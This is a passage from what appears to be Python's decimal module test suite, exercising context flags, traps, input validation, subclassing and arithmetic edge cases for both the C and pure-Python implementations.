self.assertRaises(signal, f, b)
else:
self.assertIs(f(b), True)
self.assertTrue(context.flags[FloatOperation])
small_d = Decimal('0.25')
big_d = Decimal('3.0')
small_f = 0.25
big_f = 3.0
zero_d = Decimal('0.0')
neg_zero_d = Decimal('-0.0')
zero_f = 0.0
neg_zero_f = -0.0
inf_d = Decimal('Infinity')
neg_inf_d = Decimal('-Infinity')
inf_f = float('inf')
neg_inf_f = float('-inf')
def doit(c, signal=None):
# Order
for attr in '__lt__', '__le__':
assert_attr(small_d, big_f, attr, c, signal)
for attr in '__gt__', '__ge__':
assert_attr(big_d, small_f, attr, c, signal)
# Equality
assert_attr(small_d, small_f, '__eq__', c, None)
assert_attr(neg_zero_d, neg_zero_f, '__eq__', c, None)
assert_attr(neg_zero_d, zero_f, '__eq__', c, None)
assert_attr(zero_d, neg_zero_f, '__eq__', c, None)
assert_attr(zero_d, zero_f, '__eq__', c, None)
assert_attr(neg_inf_d, neg_inf_f, '__eq__', c, None)
assert_attr(inf_d, inf_f, '__eq__', c, None)
# Inequality
assert_attr(small_d, big_f, '__ne__', c, None)
assert_attr(Decimal('0.1'), 0.1, '__ne__', c, None)
assert_attr(neg_inf_d, inf_f, '__ne__', c, None)
assert_attr(inf_d, neg_inf_f, '__ne__', c, None)
assert_attr(Decimal('NaN'), float('nan'), '__ne__', c, None)
def test_containers(c, signal=None):
c.clear_flags()
s = set([100.0, Decimal('100.0')])
self.assertEqual(len(s), 1)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
if signal:
self.assertRaises(signal, sorted, [1.0, Decimal('10.0')])
else:
s = sorted([10.0, Decimal('10.0')])
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
b = 10.0 in [Decimal('10.0'), 1.0]
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
b = 10.0 in {Decimal('10.0'):'a', 1.0:'b'}
self.assertTrue(c.flags[FloatOperation])
nc = Context()
with localcontext(nc) as c:
self.assertFalse(c.traps[FloatOperation])
doit(c, signal=None)
test_containers(c, signal=None)
c.traps[FloatOperation] = True
doit(c, signal=FloatOperation)
test_containers(c, signal=FloatOperation)
def test_float_operation_default(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
Inexact = self.decimal.Inexact
FloatOperation= self.decimal.FloatOperation
context = Context()
self.assertFalse(context.flags[FloatOperation])
self.assertFalse(context.traps[FloatOperation])
context.clear_traps()
context.traps[Inexact] = True
context.traps[FloatOperation] = True
self.assertTrue(context.traps[FloatOperation])
self.assertTrue(context.traps[Inexact])
class CContextFlags(ContextFlags):
decimal = C
class PyContextFlags(ContextFlags):
decimal = P
class SpecialContexts(unittest.TestCase):
"""Test the context templates."""
def test_context_templates(self):
BasicContext = self.decimal.BasicContext
ExtendedContext = self.decimal.ExtendedContext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
Underflow = self.decimal.Underflow
Clamped = self.decimal.Clamped
assert_signals(self, BasicContext, 'traps',
[InvalidOperation, DivisionByZero, Overflow, Underflow, Clamped]
)
savecontext = getcontext().copy()
basic_context_prec = BasicContext.prec
extended_context_prec = ExtendedContext.prec
ex = None
try:
BasicContext.prec = ExtendedContext.prec = 441
for template in BasicContext, ExtendedContext:
setcontext(template)
c = getcontext()
self.assertIsNot(c, template)
self.assertEqual(c.prec, 441)
except Exception as e:
ex = e.__class__
finally:
BasicContext.prec = basic_context_prec
ExtendedContext.prec = extended_context_prec
setcontext(savecontext)
if ex:
raise ex
def test_default_context(self):
DefaultContext = self.decimal.DefaultContext
BasicContext = self.decimal.BasicContext
ExtendedContext = self.decimal.ExtendedContext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
self.assertEqual(BasicContext.prec, 9)
self.assertEqual(ExtendedContext.prec, 9)
assert_signals(self, DefaultContext, 'traps',
[InvalidOperation, DivisionByZero, Overflow]
)
savecontext = getcontext().copy()
default_context_prec = DefaultContext.prec
ex = None
try:
c = getcontext()
saveprec = c.prec
DefaultContext.prec = 961
c = getcontext()
self.assertEqual(c.prec, saveprec)
setcontext(DefaultContext)
c = getcontext()
self.assertIsNot(c, DefaultContext)
self.assertEqual(c.prec, 961)
except Exception as e:
ex = e.__class__
finally:
DefaultContext.prec = default_context_prec
setcontext(savecontext)
if ex:
raise ex
class CSpecialContexts(SpecialContexts):
decimal = C
class PySpecialContexts(SpecialContexts):
decimal = P
class ContextInputValidation(unittest.TestCase):
def test_invalid_context(self):
Context = self.decimal.Context
DefaultContext = self.decimal.DefaultContext
c = DefaultContext.copy()
# prec, Emax
for attr in ['prec', 'Emax']:
setattr(c, attr, 999999)
self.assertEqual(getattr(c, attr), 999999)
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(TypeError, setattr, c, attr, 'xyz')
# Emin
setattr(c, 'Emin', -999999)
self.assertEqual(getattr(c, 'Emin'), -999999)
self.assertRaises(ValueError, setattr, c, 'Emin', 1)
self.assertRaises(TypeError, setattr, c, 'Emin', (1,2,3))
self.assertRaises(TypeError, setattr, c, 'rounding', -1)
self.assertRaises(TypeError, setattr, c, 'rounding', 9)
self.assertRaises(TypeError, setattr, c, 'rounding', 1.0)
self.assertRaises(TypeError, setattr, c, 'rounding', 'xyz')
# capitals, clamp
for attr in ['capitals', 'clamp']:
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(ValueError, setattr, c, attr, 2)
self.assertRaises(TypeError, setattr, c, attr, [1,2,3])
# Invalid attribute
self.assertRaises(AttributeError, setattr, c, 'emax', 100)
# Invalid signal dict
self.assertRaises(TypeError, setattr, c, 'flags', [])
self.assertRaises(KeyError, setattr, c, 'flags', {})
self.assertRaises(KeyError, setattr, c, 'traps',
{'InvalidOperation':0})
# Attributes cannot be deleted
for attr in ['prec', 'Emax', 'Emin', 'rounding', 'capitals', 'clamp',
'flags', 'traps']:
self.assertRaises(AttributeError, c.__delattr__, attr)
# Invalid attributes
self.assertRaises(TypeError, getattr, c, 9)
self.assertRaises(TypeError, setattr, c, 9)
# Invalid values in constructor
self.assertRaises(TypeError, Context, rounding=999999)
self.assertRaises(TypeError, Context, rounding='xyz')
self.assertRaises(ValueError, Context, clamp=2)
self.assertRaises(ValueError, Context, capitals=-1)
self.assertRaises(KeyError, Context, flags=["P"])
self.assertRaises(KeyError, Context, traps=["Q"])
# Type error in conversion
self.assertRaises(TypeError, Context, flags=(0,1))
self.assertRaises(TypeError, Context, traps=(1,0))
class CContextInputValidation(ContextInputValidation):
decimal = C
class PyContextInputValidation(ContextInputValidation):
decimal = P
class ContextSubclassing(unittest.TestCase):
def test_context_subclassing(self):
decimal = self.decimal
Decimal = decimal.Decimal
Context = decimal.Context
Clamped = decimal.Clamped
DivisionByZero = decimal.DivisionByZero
Inexact = decimal.Inexact
Overflow = decimal.Overflow
Rounded = decimal.Rounded
Subnormal = decimal.Subnormal
Underflow = decimal.Underflow
InvalidOperation = decimal.InvalidOperation
class MyContext(Context):
def __init__(self, prec=None, rounding=None, Emin=None, Emax=None,
capitals=None, clamp=None, flags=None,
traps=None):
Context.__init__(self)
if prec is not None:
self.prec = prec
if rounding is not None:
self.rounding = rounding
if Emin is not None:
self.Emin = Emin
if Emax is not None:
self.Emax = Emax
if capitals is not None:
self.capitals = capitals
if clamp is not None:
self.clamp = clamp
if flags is not None:
if isinstance(flags, list):
flags = {v:(v in flags) for v in OrderedSignals[decimal] + flags}
self.flags = flags
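                    # e.g. MyContext(flags=[Rounded]) expands the list into a
                    # dict mapping every signal in OrderedSignals to False
                    # except Rounded (illustrative; traps below work the same).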
if traps is not None:
if isinstance(traps, list):
traps = {v:(v in traps) for v in OrderedSignals[decimal] + traps}
self.traps = traps
c = Context()
d = MyContext()
for attr in ('prec', 'rounding', 'Emin', 'Emax', 'capitals', 'clamp',
'flags', 'traps'):
self.assertEqual(getattr(c, attr), getattr(d, attr))
# prec
self.assertRaises(ValueError, MyContext, **{'prec':-1})
c = MyContext(prec=1)
self.assertEqual(c.prec, 1)
self.assertRaises(InvalidOperation, c.quantize, Decimal('9e2'), 0)
# rounding
self.assertRaises(TypeError, MyContext, **{'rounding':'XYZ'})
c = MyContext(rounding=ROUND_DOWN, prec=1)
self.assertEqual(c.rounding, ROUND_DOWN)
self.assertEqual(c.plus(Decimal('9.9')), 9)
# Emin
self.assertRaises(ValueError, MyContext, **{'Emin':5})
c = MyContext(Emin=-1, prec=1)
self.assertEqual(c.Emin, -1)
x = c.add(Decimal('1e-99'), Decimal('2.234e-2000'))
self.assertEqual(x, Decimal('0.0'))
for signal in (Inexact, Underflow, Subnormal, Rounded, Clamped):
self.assertTrue(c.flags[signal])
# Emax
self.assertRaises(ValueError, MyContext, **{'Emax':-1})
c = MyContext(Emax=1, prec=1)
self.assertEqual(c.Emax, 1)
self.assertRaises(Overflow, c.add, Decimal('1e99'), Decimal('2.234e2000'))
if self.decimal == C:
for signal in (Inexact, Overflow, Rounded):
self.assertTrue(c.flags[signal])
# capitals
self.assertRaises(ValueError, MyContext, **{'capitals':-1})
c = MyContext(capitals=0)
self.assertEqual(c.capitals, 0)
x = c.create_decimal('1E222')
self.assertEqual(c.to_sci_string(x), '1e+222')
# clamp
self.assertRaises(ValueError, MyContext, **{'clamp':2})
c = MyContext(clamp=1, Emax=99)
self.assertEqual(c.clamp, 1)
x = c.plus(Decimal('1e99'))
self.assertEqual(str(x), '1.000000000000000000000000000E+99')
# flags
self.assertRaises(TypeError, MyContext, **{'flags':'XYZ'})
c = MyContext(flags=[Rounded, DivisionByZero])
for signal in (Rounded, DivisionByZero):
self.assertTrue(c.flags[signal])
c.clear_flags()
for signal in OrderedSignals[decimal]:
self.assertFalse(c.flags[signal])
# traps
self.assertRaises(TypeError, MyContext, **{'traps':'XYZ'})
c = MyContext(traps=[Rounded, DivisionByZero])
for signal in (Rounded, DivisionByZero):
self.assertTrue(c.traps[signal])
c.clear_traps()
for signal in OrderedSignals[decimal]:
self.assertFalse(c.traps[signal])
class CContextSubclassing(ContextSubclassing):
decimal = C
class PyContextSubclassing(ContextSubclassing):
decimal = P
@skip_if_extra_functionality
class CheckAttributes(unittest.TestCase):
def test_module_attributes(self):
# Architecture dependent context limits
self.assertEqual(C.MAX_PREC, P.MAX_PREC)
self.assertEqual(C.MAX_EMAX, P.MAX_EMAX)
self.assertEqual(C.MIN_EMIN, P.MIN_EMIN)
self.assertEqual(C.MIN_ETINY, P.MIN_ETINY)
self.assertTrue(C.HAVE_THREADS is True or C.HAVE_THREADS is False)
self.assertTrue(P.HAVE_THREADS is True or P.HAVE_THREADS is False)
self.assertEqual(C.__version__, P.__version__)
self.assertEqual(dir(C), dir(P))
def test_context_attributes(self):
x = [s for s in dir(C.Context()) if '__' in s or not s.startswith('_')]
y = [s for s in dir(P.Context()) if '__' in s or not s.startswith('_')]
self.assertEqual(set(x) - set(y), set())
def test_decimal_attributes(self):
x = [s for s in dir(C.Decimal(9)) if '__' in s or not s.startswith('_')]
        y = [s for s in dir(P.Decimal(9)) if '__' in s or not s.startswith('_')]
self.assertEqual(set(x) - set(y), set())
class Coverage(unittest.TestCase):
def test_adjusted(self):
Decimal = self.decimal.Decimal
self.assertEqual(Decimal('1234e9999').adjusted(), 10002)
# XXX raise?
self.assertEqual(Decimal('nan').adjusted(), 0)
self.assertEqual(Decimal('inf').adjusted(), 0)
def test_canonical(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
x = Decimal(9).canonical()
self.assertEqual(x, 9)
c = getcontext()
x = c.canonical(Decimal(9))
self.assertEqual(x, 9)
def test_context_repr(self):
c = self.decimal.DefaultContext.copy()
c.prec = 425000000
c.Emax = 425000000
c.Emin = -425000000
c.rounding = ROUND_HALF_DOWN
c.capitals = 0
c.clamp = 1
for sig in OrderedSignals[self.decimal]:
c.flags[sig] = False
c.traps[sig] = False
s = c.__repr__()
t = "Context(prec=425000000, rounding=ROUND_HALF_DOWN, " \
"Emin=-425000000, Emax=425000000, capitals=0, clamp=1, " \
"flags=[], traps=[])"
self.assertEqual(s, t)
def test_implicit_context(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
with localcontext() as c:
c.prec = 1
c.Emax = 1
c.Emin = -1
# abs
self.assertEqual(abs(Decimal("-10")), 10)
# add
self.assertEqual(Decimal("7") + 1, 8)
# divide
self.assertEqual(Decimal("10") / 5, 2)
# divide_int
self.assertEqual(Decimal("10") // 7, 1)
# fma
self.assertEqual(Decimal("1.2").fma(Decimal("0.01"), 1), 1)
self.assertIs(Decimal("NaN").fma(7, 1).is_nan(), True)
# three arg power
self.assertEqual(pow(Decimal(10), 2, 7), 2)
# exp
self.assertEqual(Decimal("1.01").exp(), 3)
# is_normal
self.assertIs(Decimal("0.01").is_normal(), False)
# is_subnormal
self.assertIs(Decimal("0.01").is_subnormal(), True)
# ln
self.assertEqual(Decimal("20").ln(), 3)
# log10
self.assertEqual(Decimal("20").log10(), 1)
# logb
self.assertEqual(Decimal("580").logb(), 2)
# logical_invert
self.assertEqual(Decimal("10").logical_invert(), 1)
# minus
self.assertEqual(-Decimal("-10"), 10)
# multiply
self.assertEqual(Decimal("2") * 4, 8)
# next_minus
self.assertEqual(Decimal("10").next_minus(), 9)
# next_plus
self.assertEqual(Decimal("10").next_plus(), Decimal('2E+1'))
# normalize
self.assertEqual(Decimal("-10").normalize(), Decimal('-1E+1'))
# number_class
self.assertEqual(Decimal("10").number_class(), '+Normal')
# plus
self.assertEqual(+Decimal("-1"), -1)
# remainder
self.assertEqual(Decimal("10") % 7, 3)
# subtract
self.assertEqual(Decimal("10") - 7, 3)
# to_integral_exact
self.assertEqual(Decimal("1.12345").to_integral_exact(), 1)
# Boolean functions
self.assertTrue(Decimal("1").is_canonical())
self.assertTrue(Decimal("1").is_finite())
self.assertTrue(Decimal("1").is_finite())
self.assertTrue(Decimal("snan").is_snan())
self.assertTrue(Decimal("-1").is_signed())
self.assertTrue(Decimal("0").is_zero())
self.assertTrue(Decimal("0").is_zero())
# Copy
with localcontext() as c:
c.prec = 10000
x = 1228 ** 1523
y = -Decimal(x)
z = y.copy_abs()
self.assertEqual(z, x)
z = y.copy_negate()
self.assertEqual(z, x)
z = y.copy_sign(Decimal(1))
self.assertEqual(z, x)
def test_divmod(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
with localcontext() as c:
q, r = divmod(Decimal("10912837129"), 1001)
self.assertEqual(q, Decimal('10901935'))
self.assertEqual(r, Decimal('194'))
q, r = divmod(Decimal("NaN"), 7)
self.assertTrue(q.is_nan() and r.is_nan())
c.traps[InvalidOperation] = False
q, r = divmod(Decimal("NaN"), 7)
self.assertTrue(q.is_nan() and r.is_nan())
c.traps[InvalidOperation] = False
c.clear_flags()
q, r = divmod(Decimal("inf"), Decimal("inf"))
self.assertTrue(q.is_nan() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
q, r = divmod(Decimal("inf"), 101)
self.assertTrue(q.is_infinite() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
q, r = divmod(Decimal(0), 0)
self.assertTrue(q.is_nan() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation])
c.traps[DivisionByZero] = False
c.clear_flags()
q, r = divmod(Decimal(11), 0)
self.assertTrue(q.is_infinite() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation] and
c.flags[DivisionByZero])
def test_power(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
Overflow = self.decimal.Overflow
Rounded = self.decimal.Rounded
with localcontext() as c:
c.prec = 3
c.clear_flags()
self.assertEqual(Decimal("1.0") ** 100, Decimal('1.00'))
self.assertTrue(c.flags[Rounded])
c.prec = 1
c.Emax = 1
c.Emin = -1
c.clear_flags()
c.traps[Overflow] = False
self.assertEqual(Decimal(10000) ** Decimal("0.5"), Decimal('inf'))
self.assertTrue(c.flags[Overflow])
def test_quantize(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
with localcontext() as c:
c.prec = 1
c.Emax = 1
c.Emin = -1
c.traps[InvalidOperation] = False
x = Decimal(99).quantize(Decimal("1e1"))
self.assertTrue(x.is_nan())
def test_radix(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
c = getcontext()
self.assertEqual(Decimal("1").radix(), 10)
self.assertEqual(c.radix(), 10)
def test_rop(self):
Decimal = self.decimal.Decimal
for attr in ('__radd__', '__rsub__', '__rmul__', '__rtruediv__',
'__rdivmod__', '__rmod__', '__rfloordiv__', '__rpow__'):
self.assertIs(getattr(Decimal("1"), attr)("xyz"), NotImplemented)
def test_round(self):
# Python3 behavior: round() returns Decimal
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
with localcontext() as c:
c.prec = 28
self.assertEqual(str(Decimal("9.99").__round__()), "10")
self.assertEqual(str(Decimal("9.99e-5").__round__()), "0")
self.assertEqual(str(Decimal("1.23456789").__round__(5)), "1.23457")
self.assertEqual(str(Decimal("1.2345").__round__(10)), "1.2345000000")
self.assertEqual(str(Decimal("1.2345").__round__(-10)), "0E+10")
self.assertRaises(TypeError, Decimal("1.23").__round__, "5")
self.assertRaises(TypeError, Decimal("1.23").__round__, 5, 8)
def test_create_decimal(self):
c = self.decimal.Context()
self.assertRaises(ValueError, c.create_decimal, ["%"])
def test_int(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
with localcontext() as c:
c.prec = 9999
x = Decimal(1221**1271) / 10**3923
self.assertEqual(int(x), 1)
self.assertEqual(x.to_integral(), 2)
def test_copy(self):
Context = self.decimal.Context
c = Context()
c.prec = 10000
x = -(1172 ** 1712)
y = c.copy_abs(x)
self.assertEqual(y, -x)
y = c.copy_negate(x)
self.assertEqual(y, -x)
y = c.copy_sign(x, 1)
self.assertEqual(y, -x)
class CCoverage(Coverage):
decimal = C
class PyCoverage(Coverage):
decimal = P
class PyFunctionality(unittest.TestCase):
"""Extra functionality in decimal.py"""
def test_py_alternate_formatting(self):
# triples giving a format, a Decimal, and the expected result
Decimal = P.Decimal
localcontext = P.localcontext
test_values = [
# Issue 7094: Alternate formatting (specified by #)
('.0e', '1.0', '1e+0'),
('#.0e', '1.0', '1.e+0'),
('.0f', '1.0', '1'),
('#.0f', '1.0', '1.'),
('g', '1.1', '1.1'),
('#g', '1.1', '1.1'),
('.0g', '1', '1'),
('#.0g', '1', '1.'),
('.0%', '1.0', '100%'),
('#.0%', '1.0', '100.%'),
]
for fmt, d, result in test_values:
self.assertEqual(format(Decimal(d), fmt), result)
class PyWhitebox(unittest.TestCase):
"""White box testing for decimal.py"""
def test_py_exact_power(self):
# Rarely exercised lines in _power_exact.
Decimal = P.Decimal
localcontext = P.localcontext
with localcontext() as c:
c.prec = 8
x = Decimal(2**16) ** Decimal("-0.5")
self.assertEqual(x, Decimal('0.00390625'))
x = Decimal(2**16) ** Decimal("-0.6")
self.assertEqual(x, Decimal('0.0012885819'))
x = Decimal("256e7") ** Decimal("-0.5")
x = Decimal(152587890625) ** Decimal('-0.0625')
self.assertEqual(x, Decimal("0.2"))
x = Decimal("152587890625e7") ** Decimal('-0.0625')
x = Decimal(5**2659) ** Decimal('-0.0625')
c.prec = 1
x = Decimal("152587890625") ** Decimal('-0.5')
c.prec = 201
x = Decimal(2**578) ** Decimal("-0.5")
def test_py_immutability_operations(self):
# Do operations and check that it didn't change internal objects.
Decimal = P.Decimal
DefaultContext = P.DefaultContext
setcontext = P.setcontext
c = DefaultContext.copy()
c.traps = dict((s, 0) for s in OrderedSignals[P])
setcontext(c)
d1 = Decimal('-25e55')
b1 = Decimal('-25e55')
d2 = Decimal('33e+33')
b2 = Decimal('33e+33')
def checkSameDec(operation, useOther=False):
if useOther:
eval("d1." + operation + "(d2)")
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
self.assertEqual(d2._sign, b2._sign)
self.assertEqual(d2._int, b2._int)
self.assertEqual(d2._exp, b2._exp)
else:
eval("d1." + operation + "()")
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
Decimal(d1)
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
checkSameDec("__abs__")
checkSameDec("__add__", True)
checkSameDec("__divmod__", True)
checkSameDec("__eq__", True)
checkSameDec("__ne__", True)
checkSameDec("__le__", True)
checkSameDec("__lt__", True)
checkSameDec("__ge__", True)
checkSameDec("__gt__", True)
checkSameDec("__float__")
checkSameDec("__floordiv__", True)
checkSameDec("__hash__")
checkSameDec("__int__")
checkSameDec("__trunc__")
checkSameDec("__mod__", True)
checkSameDec("__mul__", True)
checkSameDec("__neg__")
checkSameDec("__bool__")
checkSameDec("__pos__")
checkSameDec("__pow__", True)
checkSameDec("__radd__", True)
checkSameDec("__rdivmod__", True)
checkSameDec("__repr__")
checkSameDec("__rfloordiv__", True)
checkSameDec("__rmod__", True)
checkSameDec("__rmul__", True)
checkSameDec("__rpow__", True)
checkSameDec("__rsub__", True)
checkSameDec("__str__")
checkSameDec("__sub__", True)
checkSameDec("__truediv__", True)
checkSameDec("adjusted")
checkSameDec("as_tuple")
checkSameDec("compare", True)
checkSameDec("max", True)
checkSameDec("min", True)
checkSameDec("normalize")
checkSameDec("quantize", True)
checkSameDec("remainder_near", True)
checkSameDec("same_quantum", True)
checkSameDec("sqrt")
checkSameDec("to_eng_string")
checkSameDec("to_integral")
def test_py_decimal_id(self):
Decimal = P.Decimal
d = Decimal(45)
e = Decimal(d)
self.assertEqual(str(e), '45')
self.assertNotEqual(id(d), id(e))
def test_py_rescale(self):
# Coverage
Decimal = P.Decimal
localcontext = P.localcontext
with localcontext() as c:
x = Decimal("NaN")._rescale(3, ROUND_UP)
self.assertTrue(x.is_nan())
def test_py__round(self):
# Coverage
Decimal = P.Decimal
self.assertRaises(ValueError, Decimal("3.1234")._round, 0, ROUND_UP)
class CFunctionality(unittest.TestCase):
"""Extra functionality in _decimal"""
@requires_extra_functionality
def test_c_ieee_context(self):
# issue 8786: Add support for IEEE 754 contexts to decimal module.
IEEEContext = C.IEEEContext
DECIMAL32 = C.DECIMAL32
DECIMAL64 = C.DECIMAL64
DECIMAL128 = C.DECIMAL128
def assert_rest(self, context):
self.assertEqual(context.clamp, 1)
assert_signals(self, context, 'traps', [])
assert_signals(self, context, 'flags', [])
c = IEEEContext(DECIMAL32)
self.assertEqual(c.prec, 7)
self.assertEqual(c.Emax, 96)
self.assertEqual(c.Emin, -95)
assert_rest(self, c)
c = IEEEContext(DECIMAL64)
self.assertEqual(c.prec, 16)
self.assertEqual(c.Emax, 384)
self.assertEqual(c.Emin, -383)
assert_rest(self, c)
c = IEEEContext(DECIMAL128)
self.assertEqual(c.prec, 34)
self.assertEqual(c.Emax, 6144)
self.assertEqual(c.Emin, -6143)
assert_rest(self, c)
# Invalid values
self.assertRaises(OverflowError, IEEEContext, 2**63)
self.assertRaises(ValueError, IEEEContext, -1)
self.assertRaises(ValueError, IEEEContext, 1024)
@requires_extra_functionality
def test_c_context(self):
Context = C.Context
c = Context(flags=C.DecClamped, traps=C.DecRounded)
self.assertEqual(c._flags, C.DecClamped)
self.assertEqual(c._traps, C.DecRounded)
@requires_extra_functionality
def test_constants(self):
# Condition flags
cond = (
C.DecClamped, C.DecConversionSyntax, C.DecDivisionByZero,
C.DecDivisionImpossible, C.DecDivisionUndefined,
C.DecFpuError, C.DecInexact, C.DecInvalidContext,
C.DecInvalidOperation, C.DecMallocError,
C.DecFloatOperation, C.DecOverflow, C.DecRounded,
C.DecSubnormal, C.DecUnderflow
)
# IEEEContext
self.assertEqual(C.DECIMAL32, 32)
self.assertEqual(C.DECIMAL64, 64)
self.assertEqual(C.DECIMAL128, 128)
self.assertEqual(C.IEEE_CONTEXT_MAX_BITS, 512)
# Conditions
for i, v in enumerate(cond):
self.assertEqual(v, 1<<i)
self.assertEqual(C.DecIEEEInvalidOperation,
C.DecConversionSyntax|
C.DecDivisionImpossible|
C.DecDivisionUndefined|
C.DecFpuError|
C.DecInvalidContext|
C.DecInvalidOperation|
C.DecMallocError)
self.assertEqual(C.DecErrors,
C.DecIEEEInvalidOperation|
C.DecDivisionByZero)
self.assertEqual(C.DecTraps,
C.DecErrors|C.DecOverflow|C.DecUnderflow)
class CWhitebox(unittest.TestCase):
"""Whitebox testing for _decimal"""
def test_bignum(self):
# Not exactly whitebox, but too slow with pydecimal.
Decimal = C.Decimal
localcontext = C.localcontext
b1 = 10**35
b2 = 10**36
with localcontext() as c:
c.prec = 1000000
for i in range(5):
a = random.randrange(b1, b2)
b = random.randrange(1000, 1200)
x = a ** b
y = Decimal(a) ** Decimal(b)
self.assertEqual(x, y)
def test_invalid_construction(self):
self.assertRaises(TypeError, C.Decimal, 9, "xyz")
def test_c_input_restriction(self):
# Too large for _decimal to be converted exactly
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
Context = C.Context
localcontext = C.localcontext
with localcontext(Context()):
self.assertRaises(InvalidOperation, Decimal,
"1e9999999999999999999")
def test_c_context_repr(self):
# This test is _decimal-only because flags are not printed
# in the same order.
DefaultContext = C.DefaultContext
FloatOperation = C.FloatOperation
c = DefaultContext.copy()
c.prec = 425000000
c.Emax = 425000000
c.Emin = -425000000
c.rounding = ROUND_HALF_DOWN
c.capitals = 0
c.clamp = 1
for sig in OrderedSignals[C]:
c.flags[sig] = True
c.traps[sig] = True
c.flags[FloatOperation] = True
c.traps[FloatOperation] = True
s = c.__repr__()
t = "Context(prec=425000000, rounding=ROUND_HALF_DOWN, " \
"Emin=-425000000, Emax=425000000, capitals=0, clamp=1, " \
"flags=[Clamped, InvalidOperation, DivisionByZero, Inexact, " \
"FloatOperation, Overflow, Rounded, Subnormal, Underflow], " \
"traps=[Clamped, InvalidOperation, DivisionByZero, Inexact, " \
"FloatOperation, Overflow, Rounded, Subnormal, Underflow])"
self.assertEqual(s, t)
def test_c_context_errors(self):
Context = C.Context
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
FloatOperation = C.FloatOperation
localcontext = C.localcontext
getcontext = C.getcontext
setcontext = C.setcontext
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
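        # 425000000 is MAX_PREC of a 32-bit libmpdec build, so anything larger
        # implies a 64-bit configuration (assumption used for the limits below).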
c = Context()
# SignalDict: input validation
self.assertRaises(KeyError, c.flags.__setitem__, 801, 0)
self.assertRaises(KeyError, c.traps.__setitem__, 801, 0)
self.assertRaises(ValueError, c.flags.__delitem__, Overflow)
self.assertRaises(ValueError, c.traps.__delitem__, InvalidOperation)
self.assertRaises(TypeError, setattr, c, 'flags', ['x'])
self.assertRaises(TypeError, setattr, c,'traps', ['y'])
self.assertRaises(KeyError, setattr, c, 'flags', {0:1})
self.assertRaises(KeyError, setattr, c, 'traps', {0:1})
# Test assignment from a signal dict with the correct length but
# one invalid key.
d = c.flags.copy()
del d[FloatOperation]
d["XYZ"] = 91283719
self.assertRaises(KeyError, setattr, c, 'flags', d)
self.assertRaises(KeyError, setattr, c, 'traps', d)
# Input corner cases
int_max = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
gt_max_emax = 10**18 if HAVE_CONFIG_64 else 10**9
# prec, Emax, Emin
for attr in ['prec', 'Emax']:
self.assertRaises(ValueError, setattr, c, attr, gt_max_emax)
self.assertRaises(ValueError, setattr, c, 'Emin', -gt_max_emax)
# prec, Emax, Emin in context constructor
self.assertRaises(ValueError, Context, prec=gt_max_emax)
self.assertRaises(ValueError, Context, Emax=gt_max_emax)
self.assertRaises(ValueError, Context, Emin=-gt_max_emax)
# Overflow in conversion
self.assertRaises(OverflowError, Context, prec=int_max+1)
self.assertRaises(OverflowError, Context, Emax=int_max+1)
self.assertRaises(OverflowError, Context, Emin=-int_max-2)
self.assertRaises(OverflowError, Context, clamp=int_max+1)
self.assertRaises(OverflowError, Context, capitals=int_max+1)
# OverflowError, general ValueError
for attr in ('prec', 'Emin', 'Emax', 'capitals', 'clamp'):
self.assertRaises(OverflowError, setattr, c, attr, int_max+1)
self.assertRaises(OverflowError, setattr, c, attr, -int_max-2)
if sys.platform != 'win32':
self.assertRaises(ValueError, setattr, c, attr, int_max)
self.assertRaises(ValueError, setattr, c, attr, -int_max-1)
# OverflowError: _unsafe_setprec, _unsafe_setemin, _unsafe_setemax
if C.MAX_PREC == 425000000:
self.assertRaises(OverflowError, getattr(c, '_unsafe_setprec'),
int_max+1)
self.assertRaises(OverflowError, getattr(c, '_unsafe_setemax'),
int_max+1)
self.assertRaises(OverflowError, getattr(c, '_unsafe_setemin'),
-int_max-2)
# ValueError: _unsafe_setprec, _unsafe_setemin, _unsafe_setemax
if C.MAX_PREC == 425000000:
self.assertRaises(ValueError, getattr(c, '_unsafe_setprec'), 0)
self.assertRaises(ValueError, getattr(c, '_unsafe_setprec'),
1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemax'), -1)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemax'),
1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemin'),
-1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemin'), 1)
# capitals, clamp
for attr in ['capitals', 'clamp']:
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(ValueError, setattr, c, attr, 2)
